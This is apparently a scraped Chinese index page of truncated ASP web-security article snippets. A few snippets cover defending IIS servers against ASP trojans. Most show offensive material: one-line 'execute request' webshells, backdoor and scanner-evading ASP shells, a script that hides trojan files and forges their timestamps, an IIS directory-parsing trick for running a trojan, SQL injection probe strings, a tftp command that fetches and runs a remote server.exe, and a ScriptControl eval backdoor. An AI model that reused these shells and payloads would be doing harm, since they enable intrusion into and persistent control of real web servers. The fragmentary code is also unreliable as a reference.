Time of Update: 2017-01-18
一般現今ASP木馬常通過以下四點來動作伺服器,所以我們只要將一下四處設定好就能從一 前使用IIS伺服器的站長很多,特別是對於ASP網站來說,防止ASP木馬成了網站安全最關鍵的內容。 一般現今ASP木馬常通過以下四點來動作伺服器,所以我們只要將一下四處設定好就能從一定程度上有效防止ASP木馬的入侵 一、使用FileSystemObject組件 FileSystemObject可以對檔案進行常規操作 可以通過修改註冊表,將此組件改名,來防止此類木馬的危害。
Time of Update: 2017-01-18
複製代碼 代碼如下: <%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):
Time of Update: 2017-01-18
複製代碼 代碼如下:<% function CheckFileContent(FileName) dim ClientFile,ClientText,ClientContent,DangerString,DSArray,AttackFlag,k set ClientFile=Server.CreateObject("Scripting.FileSystemObject") set
Time of Update: 2017-01-18
複製代碼 代碼如下:<% '隱藏並修改檔案的最後修改時間的aspshell '原理:通過FSO可以修改檔案的屬性,比如設定為唯讀,隱藏,系統等等;FSO中的attributes屬性修改檔案屬性,1隻讀,2隱藏,4系統檔案 ' 通過shell.application可以給檔案重新設定一個最後修改時間 '2009/02/24 write by skyfire response.write "<form method=post>" response.write
Time of Update: 2017-01-18
hanxiaolian 為了躲避 lake2 ASP站長管理助手而寫.. 一.繞過lake2 Asp木馬掃描的小馬 複製代碼 代碼如下: <% set c = CreateObject("ADOX.Catalog") c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp")) set c = Nothing c&Server.MapPath("a.asp") set
Time of Update: 2017-01-18
首先在asp檔案中寫如<%execute request("value")%>代碼如果想要隱藏,就要加入一些if判斷語句,即可然後在本地寫個表單 複製代碼 代碼如下:<form action=http://***.com/jb51.asp method=post> <textarea name=value cols=120 rows=10 width=45> set lP=server.createObject("Adodb.Stream") lP.Open
Time of Update: 2017-01-18
通過HTTP協議來訪問 一句話木馬的使用範圍(我只列舉了2種): 1)只有Database Backup的情況 Database Backup成asp檔案時候,不出現“ 編譯錯誤,缺少指令碼關閉標誌%>" 2)SA許可權的時候,一般先寫入一句話,圖個方便..(當然,直接tftp上傳鴿子運行,那更快) tftp -i ip get server.exe 一句話木馬<%execute request("a")%>的原理:
Time of Update: 2017-01-18
放在conn.asp裡就行了。 '屏蔽通過地址欄攻擊 url=Request.ServerVariables("QUERY_STRING") if instr(url,";")>=1 then url=Replace(url,";",";") : Response.Redirect("?" & url) end if '屏蔽通過表單攻擊
Time of Update: 2017-01-18
1、建立非標準目錄:mkdir images..\ 拷貝ASP木馬至目錄:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通過web訪問ASP木馬:http://ip/images../news.asp?action=login 如何刪除非標準目錄:rmdir images..\ /s 2、Windows中的IIS會對以.asp結尾的目錄中的檔案進行解析,
Time of Update: 2017-01-18
<% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")
Time of Update: 2017-01-18
說明: 1、此工具可以批量替換網站上asp,.txt,php,aspx...等等文本型的字元 2、將replace.asp上傳至網站根目錄後,運行http://網站網域名稱/replace.asp 3、為了安全,使用本程式後請刪除或更名複製代碼 代碼如下:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%option explicit Response.Buffer=true Response.CharSet="GB2312
Time of Update: 2017-01-18
<html> <head> <title>七步倒┈→專用asp後門</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO =
Time of Update: 2017-01-18
<%@LANGUAGE="VBScript" CODEPAGE="936"%> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>旁註 - 網站小助手旭方修改免殺版</title>
Time of Update: 2017-01-18
本是為了逃LAKER2兄 查ASP木馬程式的 現在已經挑戰成功,已經加為檢查對象了。公布出代碼給冰點的朋友使使,希望大家喜歡! 利用的是ADOX.Catalog組件 複製代碼 代碼如下:<% 'code by netpatch dim dbfile,sql db="netpatch.asp"
Time of Update: 2017-01-18
由於ASP它本身是伺服器提供的一項服務功能,特別是最近由dvbbs的upfile檔案出現漏洞以來,其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防範和清除,為網管人員提出了更高的技術要求.
Time of Update: 2017-01-18
複製代碼 代碼如下:1.判斷是否有注入 ;and 1=1 ;and 1=2 2.初步判斷是否是mssql ;and user>0 3.注入參數是字元 'and [查詢條件] and ''=' 4.搜尋時沒過濾參數的 'and [查詢條件] and '%25'=' 5.判斷資料庫系統
Time of Update: 2017-01-18
【上傳漏洞欺騙技術】
Time of Update: 2017-01-18
Rem ## 長整數轉換 Function toNum(s, default) If IsNumeric(s) and s <> "" then toNum = CLng(s) Else toNum = default End If
Time of Update: 2017-01-18
使用.htaccess檔案來進行301重新導向,請見我的另外一篇文章《301重新導向,網域名稱更換後跳轉到新網域名稱》 。 如果空間不支援.htaccess檔案,那麼我們還可以通過php/asp代碼來進行301重新導向。 為了將搜尋引擎的記錄更新到現在的網域名稱上面,做了幾個301重新導向的東東,給大家分享一下. asp 301轉向代碼 在 index.asp 或 default.asp 的最頂部加入以下幾行: 複製代碼 代碼如下: <% Response.Status="301
Time of Update: 2017-01-18
今天重新研究了下VB裡面的ScriptControl組件,發現asp裡面也能調用。研究了下方法,後來和lcx討論了下。得到了如下代碼,在此感謝前輩的指點,呵呵。 代碼很簡單,我就不多做解釋了,以免有人罵我裝。 複製代碼 代碼如下:<% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '參數SubCode作為過程代碼 o.run